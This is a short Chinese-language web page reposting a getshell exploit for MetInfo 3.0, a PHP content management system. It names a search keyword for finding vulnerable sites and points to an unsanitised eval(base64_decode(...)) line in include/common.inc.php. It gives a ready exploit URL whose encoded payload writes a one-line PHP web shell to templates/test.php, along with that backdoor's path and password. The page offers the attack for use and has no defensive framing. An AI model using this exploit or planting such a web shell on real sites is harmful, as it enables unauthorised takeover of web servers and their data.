您的位置:首页 > 运维架构 > Shell

MetInfo 3.0 PHP代码注入漏洞(getshell)

2014-05-29 17:22 1381 查看


MetInfo 3.0 PHP代码注入漏洞(getshell)

来源:本站转载 作者:佚名 时间:2010-11-07 TAG: 我要投稿

官网:http://www.metinfo.cn/

关键字:"Powered by MetInfo 3.0 "

来源:http://www.myhack58.com/Article/html/3/62/2010/28291.htm

描述:

在文件/include/common.inc.php第67行:

eval(base64_decode($allclass[0]));

$allclass[0] 变量未初始化 ,因此我们可以控制其值,进行代码注入的利用。

POC:http://target.com/include/common.inc.php?allclass[0]=[base64_encode(eval php code)]

Exploit:
http://target.com/include/common.inc.php?allclass[0]=ZnB1dHMoZm9wZW4oJy4uL3RlbXBsYXRlcy90ZXN0LnBocCcsJ3crJyksJzw/cGhwIGV2YWwoJF9QT1NUW2NdKTs/PicpOw==
base64编码部分内容为fputs(fopen('../templates/test.php','w+'),'<?php eval($_POST[c]);?>');

一句话后门地址:http://target.com/templates/test.php 密码:c

另一篇文章:http://www.zysafe.com/html/holes/03/2012110838257.html
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: